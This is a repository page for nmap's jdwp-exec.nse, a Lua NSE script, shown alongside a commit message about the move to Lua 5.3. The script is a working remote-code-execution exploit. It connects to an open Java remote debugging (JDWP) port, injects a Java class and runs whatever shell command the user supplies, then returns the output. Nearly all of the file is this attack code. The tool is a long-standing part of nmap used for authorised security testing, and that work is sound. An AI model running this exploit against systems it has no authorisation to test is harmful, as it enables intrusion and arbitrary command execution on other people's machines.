PenTest/nmap
1
0
Fork 0
mirror of https://github.com/nmap/nmap.git synced 2025-12-07 05:01:29 +00:00
Code Issues Projects Releases Wiki Activity
Files
a67e68b2d41580e81e8773aacad5c47e102f1ccf
nmap/scripts/jdwp-exec.nse
batrick 7f5ec526fe Merge branch 'nse-lua53' 
Lua 5.3 adds several awesome features of particular interest to nmap including
bitwise operators and integers, a utf8 library, and standard binary pack/unpack
functions.

In addition to adding Lua 5.3, this branch changes:

o Complete removal of the NSE bit library (in C), It has been replaced with
  a new Lua library wrapping Lua 5.3's bit-wise operators.

o Complete removal of the NSE bin library (in C). It has been replaced with a
  new Lua library wrapping Lua 5.3's string.pack|unpack functions.

o The bin.pack "B" format specifier (which has never worked correctly) is
  unimplemented.  All scripts/libraries which use it have been updated. Most
  usage of this option was to allow string based bit-wise operations which are no
  longer necessary now that Lua 5.3 provides integers and bit-wise operators.

o The base32/base64 libraries have been reimplemented using Lua 5.3's new
  bitwise operators. (This library was the main user of the bin.pack "B" format
  specifier.)

o A new "bits" library has been added for common bit hacks. Currently only has
  a reverse function.

Thanks to David Fifield, Daniel Miller, Jacek Wielemborek, and  Paulino
Calderon for testing this branch.
2016-07-02 17:02:27 +00:00

98 lines
3.2 KiB
Lua
Raw Blame History

local bin = require "bin"
local io = require "io"
local jdwp = require "jdwp"
local stdnse = require "stdnse"
local nmap = require "nmap"
local shortport = require "shortport"
description = [[
Attempts to exploit java's remote debugging port. When remote debugging
port is left open, it is possible to inject java bytecode and achieve
remote code execution. This script abuses this to inject and execute
a Java class file that executes the supplied shell command and returns
its output.
The script injects the JDWPSystemInfo class from
nselib/jdwp-class/ and executes its run() method which
accepts a shell command as its argument.
]]
---
-- @usage nmap -sT <target> -p <port> --script=+jdwp-exec --script-args cmd="date"
--
-- @args jdwp-exec.cmd Command to execute on the remote system.
--
-- @output
-- PORT STATE SERVICE REASON
-- 2010/tcp open search syn-ack
-- | jdwp-exec:
-- | date output:
-- | Sat Aug 11 15:27:21 Central European Daylight Time 2012
-- |_
author = "Aleksandar Nikolic"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit","intrusive"}
portrule = function(host, port)
-- JDWP will close the port if there is no valid handshake within 2
-- seconds, Service detection's NULL probe detects it as tcpwrapped.
return port.service == "tcpwrapped"
and port.protocol == "tcp" and port.state == "open"
and not(shortport.port_is_excluded(port.number,port.protocol))
end
action = function(host, port)
stdnse.sleep(5) -- let the remote socket recover from connect() scan
local status,socket = jdwp.connect(host,port) -- initialize the connection
if not status then
stdnse.debug1("error, %s",socket)
return nil
end
-- read .class file
local file = io.open(nmap.fetchfile("nselib/data/jdwp-class/JDWPExecCmd.class"), "rb")
local class_bytes = file:read("a")
file:close()
-- inject the class
local injectedClass
status,injectedClass = jdwp.injectClass(socket,class_bytes)
if not status then
stdnse.debug1("Failed to inject class")
return stdnse.format_output(false, "Failed to inject class")
end
-- find injected class method
local runMethodID = jdwp.findMethod(socket,injectedClass.id,"run",false)
if runMethodID == nil then
stdnse.debug1("Couldn't find run method")
return stdnse.format_output(false, "Couldn't find run method.")
end
-- set run() method argument
local cmd = stdnse.get_script_args(SCRIPT_NAME .. '.cmd')
if cmd == nil then
return stdnse.format_output(false, "This script requires a cmd argument to be specified.")
end
local cmdID
status,cmdID = jdwp.createString(socket,0,cmd)
if not status then
stdnse.debug1("Couldn't create string")
return stdnse.format_output(false, cmdID)
end
local runArgs = bin.pack(">CL",0x4c,cmdID) -- 0x4c is object type tag
-- invoke run method
local result
status, result = jdwp.invokeObjectMethod(socket,0,injectedClass.instance,injectedClass.thread,injectedClass.id,runMethodID,1,runArgs)
if not status then
stdnse.debug1("Couldn't invoke run method")
return stdnse.format_output(false, result)
end
-- get the result string
local _,_,stringID = bin.unpack(">CL",result)
status,result = jdwp.readString(socket,0,stringID)
return stdnse.format_output(status,result)
end
Reference in New Issue View Git Blame Copy Permalink